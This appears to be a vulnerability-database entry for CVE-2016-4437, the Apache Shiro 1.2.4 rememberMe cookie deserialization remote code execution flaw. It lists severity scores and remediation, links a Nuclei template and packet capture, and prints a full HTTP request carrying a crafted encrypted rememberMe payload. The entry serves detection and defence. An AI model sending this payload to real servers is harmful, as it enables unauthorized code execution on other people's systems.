🔙 목록으로 돌아가기

CVE-2016-4437: Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability

TitleApache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability
Authoriamnoooob,rootxharsh,pdresearch
SeverityHigh
ImpactRemote code execution
RemediationUpgrade to a patched version of Apache Shiro
CVSS Score8.1
EPSS Score0.94303
CVE IDCVE-2016-4437
CWE IDCWE-284
Tags cve2016 cve apache rce kev packetstorm shiro deserialization oast vkev vuln

🔍 Vulnerability Description

Apache Shiro before 1.2.5, when a cipher key has not been configured for the “remember me” feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.13
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: rememberMe=QUVTL0NCQy9QS0NTNVBhZGeRj7DtJG/uBFDyA7QMIBxFqr127Bsw6rsPZBZo+OBwLF16C7fR1Rc5a5WdwXscgWx90a+HsDmDV0ckTEf95f+rT6YWy8TT45APLlb2pPhlVyZc7vAwdvtfIue6nSLk/n6LPA4PZN74EYMhmumEiZ5D2WxeriziJDKj9LC+4FJq6ma4ojfr0qrOhZt5MjeWfj+mFIBdA+/577XxGnCYHSpldBVyciHS+08YMshnmVxQppKqroi6I2qfe46SuTlIHyxeRnJvKlG8eIwPXhkI10RkRmqpdOUXw0HA3Kyj7Oefrk7u1x28w5sgCavV/VTAeEx0qGs3pB7UwFTnJ40PiCMyM7IWIQpFjnOFduH7pJ55ewtpT/aW+LTP3Xm1/EMMWpdl3EQYQqIgiwNZ6HVan7aZMyXJVPK3YqYAWTbkVch1ZNQci19f2PfTVfoaidBpiQ==
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-4437.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-4437.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A